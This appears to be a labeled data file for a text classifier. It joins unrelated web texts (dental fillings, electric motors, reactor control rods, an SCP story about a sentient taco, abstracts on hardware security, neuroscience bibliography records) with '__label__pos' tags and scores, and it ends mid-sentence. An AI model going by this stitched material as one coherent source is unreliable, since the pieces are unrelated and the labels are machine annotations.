Fillings Cavity. If you have never had a cavity, congratulations! If you have had one, you are not alone. About 78% of us have had at least one cavity by the time we reach age 17, according to a 2000 report by the U.S. Surgeon General. Fortunately there's a time-tested treatment for cavities: the dental filling. Fillings do just what the name implies — seal a small hole in your tooth, i.e., a cavity, caused by decay. This prevents the decay (a bacteria-induced infection) from spreading further into your tooth and, if untreated, continuing on to the sensitive inner pulp (nerve) tissue located in the root canal. Should that happen, you would need root canal treatment. There are a variety of materials we use to fill teeth these days, but the process of filling a tooth is similar regardless. First, we do a clinical exam of the tooth and, with x-rays, determine the extent of the decay. Then we need to remove the decayed area of the tooth, usually with a dental drill or another handheld instrument. Your tooth will be anesthetized first, so you won't feel any discomfort. If numbing injections normally provoke anxiety for you, please let us know; we can discuss medication or the use of nitrous oxide, to help with this. After we remove the decay, all debris is cleaned from the tooth, and then the filling material is applied. Types of Fillings Fillings can be divided into two broad categories: metal and tooth-colored. Both have advantages and disadvantages, which we would be happy to discuss in detail with you. Metal Fillings Metal Filling. Amalgam — The classic “silver” filling in use for more than a century, dental amalgam is actually an alloy made up of mercury, silver, tin, and copper. The mercury combines with the other metals in the amalgam to make it stable and safe. These fillings are strong and inexpensive, but also quite noticeable. They also require relatively more tooth preparation (drilling) than other types. Cast Gold — Among the most expensive restorative dental materials, cast gold combines gold with other metals for a very strong, long-lasting filling. It is also highly noticeable, which can be considered a plus or minus. Tooth-Colored Fillings Tooth-Colored Filling. Composite — A popular choice for those who don't want their fillings to show, composite is a mixture of plastic and glass, which actually bonds to the rest of the tooth. Composites are more expensive than amalgam fillings, and these materials can hold up almost as long. Less drilling of the tooth is necessary when placing composite as compared to amalgam. Porcelain — These high-tech dental ceramics are strong, lifelike, and don't stain as composites can. They are sometimes more expensive than composites because they can require the use of a dental laboratory or specialized computer-generated technology. While considered the most aesthetic filling, they can also, because of their relatively high glass content, be brittle. Glass Ionomer — Made of acrylic and glass powders, these inexpensive, translucent fillings have the advantages of blending in pretty well with natural tooth color and releasing small amounts of fluoride to help prevent decay. They don't last as long as other restorative materials. What to Expect After Getting a Filling The numbness caused by your local anesthesia should wear off within a couple of hours. Until then, it's best to avoid drinking hot or cold liquids, and eating on the side of your mouth with the new filling. Some sensitivity to hot and cold is normal in the first couple of weeks after getting a tooth filled. If it persists beyond that, or you have any actual pain when biting, please let us know. This could signal that a bite adjustment to your filling needs to be made. Continue to brush and floss as normal every day, and come in to the dental office at least twice per year for your regular checkups and cleanings. Tooth decay is a very preventable disease; with good oral hygiene and professional care, you can make your most recent cavity your last! Related Articles Tooth-Colored Fillings - Dear Doctor Magazine The Natural Beauty of Tooth-Colored Fillings The public's demand for aesthetic tooth-colored (metal free) restorations (fillings) together with the dental profession's desire to preserve as much natural tooth structure as possible, has led to the development of special “adhesive” tooth-colored restorations... Read Article Tooth Decay - Dear Doctor Magazine Tooth Decay — A Preventable Disease Tooth decay is the number one reason children and adults lose teeth during their lifetime. Yet many people don't realize that it is a preventable infection. This article explores the causes of tooth decay, its prevention, and the relationship to bacteria, sugars, and acids... Read Article Tooth Decay - Dear Doctor Magazine Tooth Decay – How To Assess Your Risk Don't wait for cavities to occur and then have them fixed — stop them before they start. Modern dentistry is moving towards an approach to managing tooth decay that is evidence-based — on years of accumulated, systematic, and valid scientific research. This article discusses what you need to know to assess your risk and change the conditions that lead to decay... Read Article
__label__pos
0.544424
Category:  What Are the Different Types of Electric Motors? A brush electric motor. AC motors may be found in mixers. A stepper motor is used to give precise control to robotic arms. On a diesel-electric locomotive, a diesel engine with reciprocating pistons provides power to an electric traction motor that turns the unit's wheels. An AC electric motor runs with alternating current. Article Details • Written By: John Sunshine • Edited By: Niki Foster • Last Modified Date: 08 November 2014 • Copyright Protected: 2003-2014 Conjecture Corporation • Print this Article Free Widgets for your Site/Blog The US Post Office uses a mail boat to deliver to other ships on the Detroit River, and it has its own zip code: 48222.  more... November 27 ,  1978 :  Harvey Milk and San Francisco Mayor George Moscone were murdered.  more... Electric motors can generally be divided into several types: alternating current (AC) motors, direct current (DC) motors, and universal motors. A DC motor will not run when supplied with AC current, nor will an AC motor run with DC current; a universal motor will run with either AC or DC current. AC motors are further subdivided into single phase and three phase motors. Single phase AC electrical supply is what is typically supplied in a home. Three phase electrical power is commonly only available in a factory setting. DC motors are also split into types. These include brush motors, brushless motors, and stepper motors. Of these types, brush motors are by far the most common. They are easy to build and very cost effective. Their major drawback is that they use carbon brushes to transfer electrical current to the rotating part, and these brushes wear over time and eventually result in the failure of the electric motor. The DC brushless motor eliminates the brushes, but is more costly and requires much more complicated drive electronics to operate. Ad A stepper motor is a special type of brushless motor that is used primarily in automation systems. A stepper motor uses a special type of construction that allows a computerized control system to "step" the rotation of the motor. This is very important when controlling a robotic arm. For instance, when you wish to move a specific distance as directed by a procedure in a program on the computer, a stepper motor may be the best choice. Universal motors tend to have many features in common with DC motors, particularly brush motors. Also called series-wound motors, they are most commonly found in household appliances that run very fast for a short period of time. Food processors, blenders, and vacuum cleaners all often operate with universal motors. Electric motors are usually sized in horsepower. The most common sizes are what are called fractional horsepower motors, i.e. 1/2 horsepower or 1/4 horsepower. Larger motors are typically only found in factories, where they can range in size to thousands of horsepower. Electric motors also come with various speed ratings. Speed is usually specified as rotations per minute (RPM) at no load condition. As the motor is loaded down, the speed will slow down. If the motor is loaded too heavily, the motor shaft will stop. This is known as the stall speed and should be avoided. Before you order an electric motor, you should determine the mounting type you require, the start up torque, the type of enclosure required, and the type of shaft output required. There are many choices in each of these categories. Hopefully, you just need to replace an existing motor that has failed and the salesperson can help you find a direct replacement. Otherwise, specifying the correct electric motor can be a daunting task. Ad More from Wisegeek You might also Like Discuss this Article anon308650 Post 15 The starting torque should be posted on the name plate of the motor you are inquiring about. anon304589 Post 14 What is the difference between a "S" type and a "KH" type AC motor? anon304049 Post 13 The starting torque of a squirrel cage rotor is low, whereas the slip ring rotor is high. cherry Post 12 Why does a tube light running on a.c. glow continuously even if the current is bidirectional? anon157750 Post 10 what i cdf? Is it applicable to single phase motors? If yes how? anon129515 Post 9 Motors are very simple. I will use a 3 phase AC single speed for example. The core of a motor is a shaft. The shaft is actually is what is excited by the windings to cause movement. There are three sets of windings each made of copper wire wrapped one on top of the other with a wax paper between each set so they are separated. Then there is the housing of the motor. There are six wires on the top of the motor. U1 V1 W1, U2 V2 W2. Depending on how you connect them it will be delta or wye. By placing the bars across U2 to V2 and V2 to W2 in the terminal lug of the motor it will be in delta. U1 to U2, V1 to V2, and W1 to W2 will be wye. There is other ways to wire these such as start delta run wye, but these are the most common where I work. anon129514 Post 8 Hopefully I can be of some assistance. Torque is determined by T = (Hp/RPM) * 63,025 <-the constant. 1Hp is equal to 746Watts. So start up torque would depend on the current draw when starting the motor. Usually in a motor that is a high torque motor it is Start Delta Run Wye. Thus not as hard on the motor or the breaker because Wye pulls so much current. anon125611 Post 7 please answer my question: what are the different parts of electric motor, please? anon64407 Post 6 does the dc motor burn when started on no load, because of mere short circuiting or is there a different reason? anon63327 Post 5 Tell me the inner construction of all types of motors and generators. anon60759 Post 4 It depends on the design designation of the motor. A, B, C or D. anon36162 Post 2 lol who knows this answer? anon30799 Post 1 What is starting torque of a motor? Post your comments Post Anonymously Login username password forgot password? Register username password confirm email
__label__pos
0.93196
GET CLOSE TO A REACTION The key to generating a steady output of energy is controlling the nuclear fission inside a reactor core. Too few fission events can slow down and ultimately stop the chain reaction. Too much fission can overheat the core and lead to a meltdown. Nuclear engineers and technicians precisely control the amount of fission taking place by inserting control rods (upper left) into the fuel assembly (red box). The rods are made of a substance that readily absorbs neutrons, like graphite or cadmium. When things get too hot, technicians lower a few control rods into the core. The rods sop up some of the ricocheting neutrons, and the fission process slows down. The reverse is also true: control rods are removed to rev up the fissioning. This simplified graphic illustrates this principle. When control rods are lifted from the fuel assembly, neutrons (from the natural decay of uranium) bounce around and bombard other uranium atoms, causing them to split. This process gives off more neutrons and causes more splitting. This is a chain reaction. The heat generated from all this fissioning is converted into steam, which turns a turbine, which turns a generator that produces electricity. If the reaction gets too hot, the control rods are re-inserted to absorb neutrons. With fewer neutrons around, there is less bombardment and fissioning. The core cools; energy output slows down. home | did you know? | maps & charts | interviews | readings | glossary | reactions | faqs | join in web site copyright 1995-2014 WGBH educational foundation PBS Online SUPPORT PROVIDED BY NEXT ON FRONTLINE The Fight for YemenApril 7th FRONTLINE on ShopPBS
__label__pos
0.603867
SCP-2848 rating: +31+x Item #: SCP-2848 Object Class: Neutralized Special Containment Procedures: SCP-2848 was to remain in the container in which it was originally discovered. SCP-2848 and its container were to be held in the Safe Wing at Site-19 in a standard, Class-1 Containment Cell. SCP-2848's containment chamber was outfitted with a basic audio system and radio, television set, and a table and chair for interviewers. Standard recording equipment for all interviews was maintained and logged. Update: The remains of SCP-2848 have been disposed of in accordance with its wishes following permission being granted by the O5 Council. Description: SCP-2848 is a taco recovered from Fiesta Mexicana Grande restaurant in ██████████, Tennessee in 1989. SCP-2848 consisted of a deep fried corn taco shell, ground beef, lettuce, tomato, white American cheese, and various spices. SCP-2848 is fully sentient, and it possesses the ability to communicate and understand spoken English. Investigations show that the shell of SCP-2848 vibrates slightly, producing sounds which are indistinguishable from human speech, though often described as 'slightly tinny.' Through unknown apparatus, SCP-2848 is able to perceive touch and smells. While SCP-2848 cannot describe the people or objects around it, it does claim to be able to 'see' things around it. Whether this is genuine response that is somehow hampered or an imagined response cause by its current state is unknown. SCP-2848 has no knowledge of how it became SCP-2848, though it recalls many events and circumstances from before this time. While extensive knowledge of current events through the preceding decades, information about its personal life, and a fair amount of data dealing with the stock market is known, SCP-2848 has no recollection of its name or the names of anyone else it knew. While it is aware of actions it took, these actions are sometimes known only out of context. Shortly after initial containment, SCP-2848 was confirmed to be highly depressed, and the Site-19 Head Psychologist, Dr. Glass, continues to have private interviews with SCP-2848 on a bi-weekly basis. In the interim, Dr. Glass has recommended that all members of the SCP-2848 team who are comfortable doing so should speak regularly with SCP-2848 and 'keep it company.' Extensive logs are kept in an attempt to narrow down the list of attendees at the restaurant that day, though currently, the information is sparse at best. SCP-2848 was found in a white, styrofoam box, apparently left at a table after being used to house SCP-2848 for transport, though SCP-2848 was left behind. It was recovered when the servers, who heard the voices coming from the trashcan and interpreted it as a demon, contacted a local priest for an exorcism, which in turn alerted the Global Occult Coalition, who in turn put SCP-2848 into the Foundation's care for study. Interview Logs: While an exhaustive collection of interviews is available, these discourses cover several daily conversations for over a decade of time. The selections presented here were chosen by the SCP-2848 containment team following its reclassification to Neutralized and are considered to exemplify SCP-2848's attitude, feelings, thoughts, and personality clearly to the reader. - Project Lead, Dr. James Kapera Initial Recovery Interview Excerpt (August 14, 1989) Dr. Kapera: SCP-2848, can you tell me anything about before you entered your current form or how you reached it? SCP-2848: I remember how things used to be a lot simpler back then. I used to be able to talk to people. I had friends. Neighbors. Now, there's no one left. Just you people, sitting here and asking me this nonsense. Dr. Kapera: Please, SCP-2848. We're not attempting to upset you. We're just trying to understand. SCP-2848: To understand? I'll tell you something you can understand. When you're old, when you're alone, there's no one left to talk tell how you feel, because there's no one left. Period. Dr. Kapera: Please, SCP-2848. Answer the question. When did you first realize you were in your current form? SCP-2848: I don't remember. Dr. Kapera: What do you remember? What was the first thing? SCP-2848: I was surrounded by white. I thought I was dead. The light was all muted, and then, they opened the lid of the box, and I screamed. Dr. Kapera: Do you remember what you were doing before that? SCP-2848: No. Dr. Kapera: 2848? SCP-2848 remained unresponsive and did not respond to further inquiries. In 1990, it was determined that SCP-2848 grew less responsive through the month of July. An interview conducted by Dr. Kapera confirmed that this was a 'hard time of the year' for SCP-2848. Interviews during this time were kept brief to maintain SCP-2848's compliance. Interview 91-288 (July 12, 1991): Dr. Kapera: Morning, 2848. SCP-2848: Good morning, Jim. Dr. Kapera: Have a good evening? SCP-2848: I did, yes. That new girl you all have is nice. Good listener. Dr. Kapera: She's trying. How've you been? SCP-2848: Not so good. It's that time of year, you know. Dr. Kapera: Yeah, I do. Can I do anything for you? Put on some music or something? SCP-2848: No, I think I'll be fine. Do you mind if we skip the interview today? Dr. Kapera: That's no problem at all. I'll talk to you tomorrow, alright? SCP-2848: Thank you. Interview 92-221 (July 16, 1992): Dr. Kapera: Just checking in, 2848. There's a new movie in the lounge, if you're interested. Some romantic thing. I've got clearance to take you. SCP-2848: Thank you, but that's not necessary. Maybe next week? Dr. Kapera: Sure. I'll talk to you then. Interview 93-11 (January 5, 1993): Dr. Kapera: 2848, why don't you ever talk about your family? SCP-2848: What's there to talk about? My sons don't talk to me, my wife is dead… Her family never cared about me anyway… Dr. Kapera: Your sons? SCP-2848: I… I'm sorry, but I don't really feel comfortable discussing it. Dr. Kapera: It could help us determine how to get you back to your old self, 2848. Any information you can give us. SCP-2848: I'm sorry, Jim. I just don't want to talk about it. Dr. Kapera: Alright. I hope you'll reconsider. We don't know how long you can stay like this. SCP-2848: Until I die, I guess. Interview 99-335 (September 10, 1999) SCP-2848: Jim? Dr. Kapera: Yeah, 2848? SCP-2848: What happens when I die? Dr. Kapera: What? SCP-2848: I was just thinking… I know I was old before this happened, but… I mean, I'm food now. What happens when I die? Dr. Kapera: Well. You don't appear to have spoiled at all since you were put into containment. Your lettuce is still green. SCP-2848: So… I'm going to stay like this forever? Dr. Kapera: We don't know, 2848. There's not enough information to make those assumptions. SCP-2848: Am I dead already? Dr. Kapera: We don't think so. No one who entered the restaurant on the day of the incident has been reported as deceased that we know of, at least. SCP-2848: So… I'm still out there, walking around? And I'm here too? Dr. Kapera: Like I said, 2848, we just don't know. If you could tell us anything to help us identify you… SCP-2848: No, no that won't be necessary. I'm at peace with this, I think. Peace with being this, I guess. Dr. Kapera: Are you alright, 2848? SCP-2848: I haven't been alright in a long time, Jim. Dr. Kapera: 2848? SCP-2848 grew unresponsive. Neutralization Log, SCP-2848: On January 14, 2001, SCP-2848 grew unresponsive. Attempts were made to revive SCP-2848, but within two hours, SCP-2848's appearance, which had been unchanged since recovery, began to drastically alter. Over the next week, the lettuce in SCP-2848 browned, followed by the tomatoes drying out. Observation was maintained while SCP-2848 degraded and rotted, similar to any other food product. It was later discovered that one of the possible original purchasers of SCP-2848, Manfred Tanish, had died on January 14, 2001. An investigation was suggested to see how much of Mr. Tanish's life coincided with SCP-2848's relation of events, but was concluded that the investigation was an unnecessary expenditure of materials. Dr. Kapera later appealed the decision, and his findings — which were later collected on his own time — have been retained as final SCP-2848: Final Investigation (see attached). SCP-2848's remains were incinerated in accordance with its final wishes after approval from the O5 Council, and its ashes were spread over the beach at Cape Cod. SCP-2848: Final Investigation On the day that SCP-2848 first became cognizant of its current form, Manfred Tanish was eating at the restaurant in question, as confirmed by a personal check written to the restaurant which was recovered from the records on the local bank. Mr. Tanish ate with several people from his work and covered the cost of the entire meal. After interviews with the other employees provided no information on the day in question; however, many of the people who were interviewed provided significant information on Mr. Tanish which has been collated into this report. Names of subjects still living have been redacted until such a time as their deaths in accordance with low-level investigative procedures in place at the time this research was performed: Subject Information Mary Bolton (d. July 7, 2007) Confirmed that M. Tanish was a widower and that his wife had died in a car crash in the early 80's (later confirmed to be July 14, 1981). Additionally confirmed that M. Tanish had at least two children. Carson Gearin (d. August 30, 2002) Noted that M. Tanish donated several thousand dollars a year to various charities. A copy of the subject's tax records was obtained to verify this information, but it was discovered that the donations — if they existed — were never deducted. The only correlation of this information possible was a framed photo of a child which was discovered to be linked to the United Way Charity. Leslie Major (d. December 23, 2010) Provided contact information for M. Tanish's next-of-kin as listed on his emergency contact records. Attempts to reach next-of-kin were unsuccessful as the number had been disconnected. Further research provided the name of the person in question, Lawrence Tanish, but no information on where they might be reached. [DATA REDACTED] Noted that M. Tanish had been estranged from his two sons since the death of his wife. Refused to provide any additional information. John Whitehead (d. March 4, 2004) Supplied useful information on the subject's worklife, including several high praises of his work ethic, fairness, and stability as an employer. Did not initially remember that M. Tanish had lost loved ones, but upon being reminded, remarked that he had "dealt with all that rather impressively" and had "never let it affect his work." [DATA REDACTED] Refused to be interviewed three times before finally relenting. Claimed a desire to avoid spreading 'bad feelings' about someone who had died. Based on the extensive interviews with SCP-2848 which I conducted over its ten years in confinement, it is my conclusion that SCP-2848 was almost certainly connected to Manfred Tanish. The mechanism by which SCP-2848 was created is currently unknown. These materials are retained here for the purposes of record keeping alone, and it is the request of the SCP-2848 team that the entry neither be retired nor removed from the core list of objects. -Dr. James Kapera Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License
__label__pos
0.735094
Learn More In recent years, hardware Trojans have drawn the attention of governments and industry as well as the scientific community. One of the main concerns is that integrated circuits, e.g., for military or critical-infrastructure applications, could be maliciously manipulated during the manufacturing process, which often takes place abroad. However, since there(More) In this paper, we propose a new Authenticated Lightweight E ncryption algorithm coined ALE. The basic operation of ALE is the AES round transformation and the AES-128 key schedule. ALE is an online single-pass authenticated encryption algorithm that supports optional associated data. Its security relies on using nonces. We provide an optimized low-area(More) The market for RFID technology has grown rapidly over the past few years. Going along with the proliferation of RFID technology is an increasing demand for secure and privacy-preserving applications. In this context, RFID tags need to be protected against physical attacks such as Differential Power Analysis (DPA) and fault attacks. The main obstacles(More) The continuous scaling of VLSI technology and the aggressive use of low power strategies (such as subthreshold voltage) make it possible to implement standard cryptographic primitives within the very limited circuit and power budget of RFID devices. On the other hand, such cryptographic implementations raise concerns regarding their vulnerability to both(More) MOS Current Mode Logic (MCML) is one of the most promising logic style to counteract power analysis attacks. Unfortunately, the static power consumption of MCML standard cells is significantly higher compared to equivalent functions implemented using static CMOS logic. As a result, the use of such a logic style is very limited in portable devices.(More) Malicious alterations of integrated circuits (ICs), introduced during either the design or fabrication process, are increasingly perceived as a serious concern by the global semiconductor industry. Such rogue alterations often take the form of a " hardware Trojan, " which may be activated from remote after the compromised chip or system has been deployed in(More) In recent years, hardware Trojans have drawn the attention of governments and industry as well as the scientific community. One of the main concerns is that integrated circuits, e.g., for military or critical-infrastructure applications, could be maliciously manipulated during the manufacturing process, which often takes place abroad. However, since there(More) The design of lightweight block ciphers has been a very active research topic over the last years. However, the lack of comparative source codes generally makes it hard to evaluate the extent to which different ciphers actually reach their low-cost goals, on different platforms. This paper reports on an initiative aimed to partially relax this issue. First,(More) Power-based side channel attacks are a significant security risk, especially for embedded applications. To improve the security of such devices, protected logic styles have been proposed as an alternative to CMOS. However, they should only be used sparingly, since their area and power consumption are both significantly larger than for CMOS. We propose to(More) Nowadays the need of speed in cipher and decipher operations is more important than in the past. This is due to the diffusion of real time applications, which fact involves the use of cryptography. Many co-processors for cryptography were studied and presented in the past, but only few works were addressed to the enhancement of the instruction set(More)
__label__pos
0.794246
TY - JOUR AB - The synaptic connection from medial habenula (MHb) to interpeduncular nucleus (IPN) is critical for emotion-related behaviors and uniquely expresses R-type Ca2+ channels (Cav2.3) and auxiliary GABAB receptor (GBR) subunits, the K+-channel tetramerization domain-containing proteins (KCTDs). Activation of GBRs facilitates or inhibits transmitter release from MHb terminals depending on the IPN subnucleus, but the role of KCTDs is unknown. We therefore examined the localization and function of Cav2.3, GBRs, and KCTDs in this pathway in mice. We show in heterologous cells that KCTD8 and KCTD12b directly bind to Cav2.3 and that KCTD8 potentiates Cav2.3 currents in the absence of GBRs. In the rostral IPN, KCTD8, KCTD12b, and Cav2.3 co-localize at the presynaptic active zone. Genetic deletion indicated a bidirectional modulation of Cav2.3-mediated release by these KCTDs with a compensatory increase of KCTD8 in the active zone in KCTD12b-deficient mice. The interaction of Cav2.3 with KCTDs therefore scales synaptic strength independent of GBR activation. AU - Bhandari, Pradeep AU - Vandael, David H AU - Fernández-Fernández, Diego AU - Fritzius, Thorsten AU - Kleindienst, David AU - Önal, Hüseyin C AU - Montanaro-Punzengruber, Jacqueline-Claire AU - Gassmann, Martin AU - Jonas, Peter M AU - Kulik, Akos AU - Bettler, Bernhard AU - Shigemoto, Ryuichi AU - Koppensteiner, Peter ID - 9437 JF - eLife TI - GABAB receptor auxiliary subunits modulate Cav2.3-mediated release from medial habenula terminals VL - 10 ER - TY - JOUR AB - AMPA receptor (AMPAR) abundance and positioning at excitatory synapses regulates the strength of transmission. Changes in AMPAR localisation can enact synaptic plasticity, allowing long-term information storage, and is therefore tightly controlled. Multiple mechanisms regulating AMPAR synaptic anchoring have been described, but with limited coherence or comparison between reports, our understanding of this process is unclear. Here, combining synaptic recordings from mouse hippocampal slices and super-resolution imaging in dissociated cultures, we compare the contributions of three AMPAR interaction domains controlling transmission at hippocampal CA1 synapses. We show that the AMPAR C-termini play only a modulatory role, whereas the extracellular N-terminal domain (NTD) and PDZ interactions of the auxiliary subunit TARP γ8 are both crucial, and each is sufficient to maintain transmission. Our data support a model in which γ8 accumulates AMPARs at the postsynaptic density, where the NTD further tunes their positioning. This interplay between cytosolic (TARP γ8) and synaptic cleft (NTD) interactions provides versatility to regulate synaptic transmission and plasticity. AU - Watson, Jake AU - Pinggera, Alexandra AU - Ho, Hinze AU - Greger, Ingo H. ID - 9985 IS - 1 JF - Nature Communications TI - AMPA receptor anchoring at CA1 synapses is determined by N-terminal domain and TARP γ8 interactions VL - 12 ER - TY - JOUR AB - Post-tetanic potentiation (PTP) is an attractive candidate mechanism for hippocampus-dependent short-term memory. Although PTP has a uniquely large magnitude at hippocampal mossy fiber-CA3 pyramidal neuron synapses, it is unclear whether it can be induced by natural activity and whether its lifetime is sufficient to support short-term memory. We combined in vivo recordings from granule cells (GCs), in vitro paired recordings from mossy fiber terminals and postsynaptic CA3 neurons, and “flash and freeze” electron microscopy. PTP was induced at single synapses and showed a low induction threshold adapted to sparse GC activity in vivo. PTP was mainly generated by enlargement of the readily releasable pool of synaptic vesicles, allowing multiplicative interaction with other plasticity forms. PTP was associated with an increase in the docked vesicle pool, suggesting formation of structural “pool engrams.” Absence of presynaptic activity extended the lifetime of the potentiation, enabling prolonged information storage in the hippocampal network. AU - Vandael, David H AU - Borges Merjane, Carolina AU - Zhang, Xiaomin AU - Jonas, Peter M ID - 8001 IS - 3 JF - Neuron SN - 0896-6273 TI - Short-term plasticity at hippocampal mossy fiber synapses is induced by natural activity patterns and associated with vesicle pool engram formation VL - 107 ER - TY - JOUR AB - Dentate gyrus granule cells (GCs) connect the entorhinal cortex to the hippocampal CA3 region, but how they process spatial information remains enigmatic. To examine the role of GCs in spatial coding, we measured excitatory postsynaptic potentials (EPSPs) and action potentials (APs) in head-fixed mice running on a linear belt. Intracellular recording from morphologically identified GCs revealed that most cells were active, but activity level varied over a wide range. Whereas only ∼5% of GCs showed spatially tuned spiking, ∼50% received spatially tuned input. Thus, the GC population broadly encodes spatial information, but only a subset relays this information to the CA3 network. Fourier analysis indicated that GCs received conjunctive place-grid-like synaptic input, suggesting code conversion in single neurons. GC firing was correlated with dendritic complexity and intrinsic excitability, but not extrinsic excitatory input or dendritic cable properties. Thus, functional maturation may control input-output transformation and spatial code conversion. AU - Zhang, Xiaomin AU - Schlögl, Alois AU - Jonas, Peter M ID - 8261 IS - 6 JF - Neuron SN - 0896-6273 TI - Selective routing of spatial information flow from input to output in hippocampal granule cells VL - 107 ER - TY - JOUR AB - How structural and functional properties of synapses relate to each other is a fundamental question in neuroscience. Electrophysiology has elucidated mechanisms of synaptic transmission, and electron microscopy (EM) has provided insight into morphological properties of synapses. Here we describe an enhanced method for functional EM (“flash and freeze”), combining optogenetic stimulation with high-pressure freezing. We demonstrate that the improved method can be applied to intact networks in acute brain slices and organotypic slice cultures from mice. As a proof of concept, we probed vesicle pool changes during synaptic transmission at the hippocampal mossy fiber-CA3 pyramidal neuron synapse. Our findings show overlap of the docked vesicle pool and the functionally defined readily releasable pool and provide evidence of fast endocytosis at this synapse. Functional EM with acute slices and slice cultures has the potential to reveal the structural and functional mechanisms of transmission in intact, genetically perturbed, and disease-affected synapses. AU - Borges Merjane, Carolina AU - Kim, Olena AU - Jonas, Peter M ID - 7473 JF - Neuron SN - 0896-6273 TI - Functional electron microscopy (“Flash and Freeze”) of identified cortical synapses in acute brain slices VL - 105 ER - TY - JOUR AB - Biophysical modeling of neuronal networks helps to integrate and interpret rapidly growing and disparate experimental datasets at multiple scales. The NetPyNE tool (www.netpyne.org) provides both programmatic and graphical interfaces to develop data-driven multiscale network models in NEURON. NetPyNE clearly separates model parameters from implementation code. Users provide specifications at a high level via a standardized declarative language, for example connectivity rules, to create millions of cell-to-cell connections. NetPyNE then enables users to generate the NEURON network, run efficiently parallelized simulations, optimize and explore network parameters through automated batch runs, and use built-in functions for visualization and analysis – connectivity matrices, voltage traces, spike raster plots, local field potentials, and information theoretic measures. NetPyNE also facilitates model sharing by exporting and importing standardized formats (NeuroML and SONATA). NetPyNE is already being used to teach computational neuroscience students and by modelers to investigate brain regions and phenomena. AU - Dura-Bernal, Salvador AU - Suter, Benjamin AU - Gleeson, Padraig AU - Cantarelli, Matteo AU - Quintana, Adrian AU - Rodriguez, Facundo AU - Kedziora, David J AU - Chadderdon, George L AU - Kerr, Cliff C AU - Neymotin, Samuel A AU - McDougal, Robert A AU - Hines, Michael AU - Shepherd, Gordon MG AU - Lytton, William W ID - 7405 JF - eLife SN - 2050-084X TI - NetPyNE, a tool for data-driven multiscale modeling of brain circuits VL - 8 ER - TY - THES AB - Distinguishing between similar experiences is achieved by the brain in a process called pattern separation. In the hippocampus, pattern separation reduces the interference of memories and increases the storage capacity by decorrelating similar inputs patterns of neuronal activity into non-overlapping output firing patterns. Winners-take-all (WTA) mechanism is a theoretical model for pattern separation in which a "winner" cell suppresses the activity of the neighboring neurons through feedback inhibition. However, if the network properties of the dentate gyrus support WTA as a biologically conceivable model remains unknown. Here, we showed that the connectivity rules of PV+interneurons and their synaptic properties are optimizedfor efficient pattern separation. We found using multiple whole-cell in vitrorecordings that PV+interneurons mainly connect to granule cells (GC) through lateral inhibition, a form of feedback inhibition in which a GC inhibits other GCs but not itself through the activation of PV+interneurons. Thus, lateral inhibition between GC–PV+interneurons was ~10 times more abundant than recurrent connections. Furthermore, the GC–PV+interneuron connectivity was more spatially confined but less abundant than PV+interneurons–GC connectivity, leading to an asymmetrical distribution of excitatory and inhibitory connectivity. Our network model of the dentate gyrus with incorporated real connectivity rules efficiently decorrelates neuronal activity patterns using WTA as the primary mechanism. This process relied on lateral inhibition, fast-signaling properties of PV+interneurons and the asymmetrical distribution of excitatory and inhibitory connectivity. Finally, we found that silencing the activity of PV+interneurons in vivoleads to acute deficits in discrimination between similar environments, suggesting that PV+interneuron networks are necessary for behavioral relevant computations. Our results demonstrate that PV+interneurons possess unique connectivity and fast signaling properties that confer to the dentate gyrus network properties that allow the emergence of pattern separation. Thus, our results contribute to the knowledge of how specific forms of network organization underlie sophisticated types of information processing. AU - Espinoza Martinez, Claudia M ID - 6363 SN - 2663-337X TI - Parvalbumin+ interneurons enable efficient pattern separation in hippocampal microcircuits ER - TY - JOUR AB - Fast-spiking, parvalbumin-expressing GABAergic interneurons (PV+-BCs) express a complex machinery of rapid signaling mechanisms, including specialized voltage-gated ion channels to generate brief action potentials (APs). However, short APs are associated with overlapping Na+ and K+ fluxes and are therefore energetically expensive. How the potentially vicious combination of high AP frequency and inefficient spike generation can be reconciled with limited energy supply is presently unclear. To address this question, we performed direct recordings from the PV+-BC axon, the subcellular structure where active conductances for AP initiation and propagation are located. Surprisingly, the energy required for the AP was, on average, only ∼1.6 times the theoretical minimum. High energy efficiency emerged from the combination of fast inactivation of Na+ channels and delayed activation of Kv3-type K+ channels, which minimized ion flux overlap during APs. Thus, the complementary tuning of axonal Na+ and K+ channel gating optimizes both fast signaling properties and metabolic efficiency. Hu et al. demonstrate that action potentials in parvalbumin-expressing GABAergic interneuron axons are energetically efficient, which is highly unexpected given their brief duration. High energy efficiency emerges from the combination of fast inactivation of voltage-gated Na+ channels and delayed activation of Kv3 channels in the axon. AU - Hu, Hua AU - Roth, Fabian AU - Vandael, David H AU - Jonas, Peter M ID - 320 IS - 1 JF - Neuron TI - Complementary tuning of Na+ and K+ channel gating underlies fast and energy-efficient action potentials in GABAergic interneuron axons VL - 98 ER - TY - THES AB - Neuronal networks in the brain consist of two main types of neuron, glutamatergic principal neurons and GABAergic interneurons. Although these interneurons only represent 10–20% of the whole population, they mediate feedback and feedforward inhibition and are involved in the generation of high-frequency network oscillations. A hallmark functional property of GABAergic interneurons, especially of the parvalbumin‑expressing (PV+) subtypes, is the speed of signaling at their output synapse across species and brain regions. Several molecular and subcellular factors may underlie the submillisecond signaling at GABAergic synapses. Such as the selective use of P/Q type Ca2+ channels and the tight coupling between Ca2+ channels and Ca2+ sensors of exocytosis. However, whether the molecular identity of the release sensor contributes to these signaling properties remains unclear. Besides, these interneurons are mainly show depression in response to train of stimuli. How could they keep sufficient release to control the activity of postsynaptic principal neurons during high network activity, is largely elusive. For my Ph.D. work, we firstly examined the Ca2+ sensor of exocytosis at the GABAergic basket cell (BC) to Purkinje cell (PC) synapse in the cerebellum. Immunolabeling suggested that BC terminals selectively expressed synaptotagmin 2 (Syt2), whereas synaptotagmin 1 (Syt1) was enriched in excitatory terminals. Genetic elimination of Syt2 reduced action potential-evoked release to ~10% compared to the wild-type control, identifying Syt2 as the major Ca2+ sensor at BC‑PC synapses. Differential adenovirus-mediated rescue revealed Syt2 triggered release with shorter latency and higher temporal precision, and mediated faster vesicle pool replenishment than Syt1. Furthermore, deletion of Syt2 severely reduced and delayed disynaptic inhibition following parallel fiber stimulation. Thus, the selective use of Syt2 as the release sensor at BC–PC synapse ensures fast feedforward inhibition in cerebellar microcircuits. Additionally, we tested the function of another synaptotagmin member, Syt7, for inhibitory synaptic transmission at the BC–PC synapse. Syt7 is thought to be a Ca2+ sensor that mediates asynchronous transmitter release and facilitation at synapses. However, it is strongly expressed in fast-spiking, PV+ GABAergic interneurons and the output synapses of these neurons produce only minimal asynchronous release and show depression rather than facilitation. How could Syt7, a 